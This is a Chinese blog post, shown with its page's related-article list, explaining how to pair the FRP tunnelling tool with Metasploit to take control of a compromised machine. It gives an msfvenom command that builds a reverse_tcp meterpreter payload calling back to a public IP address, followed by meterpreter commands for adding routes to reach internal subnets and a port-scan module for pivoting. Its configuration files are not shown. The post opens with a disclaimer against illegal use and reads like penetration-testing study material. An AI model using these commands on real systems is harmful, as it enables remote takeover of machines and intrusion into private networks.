美文网首页
MSF+FRP实现内网渗透

MSF+FRP实现内网渗透

作者: 无情剑客Burning | 来源:发表于2020-09-27 21:18 被阅读0次

声明: 严禁用作非法目的,谢绝一切形式的转载。

这里对介绍了如何通过frp进行内网穿透。本篇 文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。

网络拓扑

通过家庭kali主机,获取到肉鸡的meterpreter。

frp配置

frps

frp服务器端配置文件frps.ini如下:

使用了dashboard。通过dashboard可以查看frp服务器的状态。

运行frps

./frps -c frps.ini

frpc

frp客户端配置文件frpc.ini如下:

运行frpc

./frpc -c frpc.ini

MSF

生成木马

通过如下命令生成木马,注意这里的LHOST是公网的ip,LPORT是上面frpc.ini的remote_port。这是最重要的地方。

msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=47.92.90.25 LPORT=7002  -i 3 -f elf -o test_7002

获取meterpreter

注意这里的lhost是localip即127.0.0.1、lport是localport即5555。这里是端口进行了转发。

获取路由信息

run get_local_subnets

自动添加路由

run post/multi/manage/autoroute

查看路由信息

run autoroute -p

注意这里的网关是session 1。

扫描开放的端口

使用auxiliary/scanner/portscan/tcp模块进行端口扫描。

这些扫描大多数的噢没有nmap强大,但是nmap在这里不能直接使用,需要设置socks代理,后续文章会详细介绍如何通过nmap进行扫描。

数据流

在"肉鸡"出查看7002端口的数据流。

在Kali中查看ip=47.92.90.25的数据流。

公众号

更多内容,欢迎关注我的微信公众号:无情剑客。

相关文章

  • MSF+FRP实现内网渗透

    声明: 严禁用作非法目的,谢绝一切形式的转载。 在这里[https://mp.weixin.qq.com/s?__...

  • 基于MetaSploit内网穿透渗透测试

    自己在无聊捣鼓windows渗透的时候想到以往都是基于内网渗透,想要更加自由地进行渗透就需要内网穿透实现可以任意控...

  • 内网渗透

    内网渗透

  • 当我讲起内网渗透,他们都弃我而去了

    前言在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 环境搭建...

  • 网络嗅探

    1、 (1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。 (2)内网渗透技术:嗅探、假消息攻...

  • 实战——红日ATT&CK系列靶场(一)

    前言: 在最近一年的工作中,很少能接触到内网渗透的工作,为了进一步锻炼内网渗透的能力,理清内网渗透中的思路及攻击手...

  • 【内网渗透】记录一次内网渗透

    在公司进行渗透测试项目,网站是asp的网站,有个上传点,但是上传的后缀名只能是jpg,gif,png,通过00截断...

  • 我是如何逃过所有杀软进行内网端口转发

    平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。 常见的端口转发 lcx.ex...

  • 内网渗透_域渗透2

    先放地址:https://bithack.io/forum/267 自从第一眼看到这篇文章之后就顺手将环境保存了网...

  • 内网渗透_域渗透3

    本篇文章接续上一篇文章内网渗透_域渗透2进行进一步测试,环境链接见最下。 一、理清思路 首先要能够获取域内一台主机...

网友评论

      本文标题:MSF+FRP实现内网渗透

      本文链接:https://www.haomeiwen.com/subject/grrjtktx.html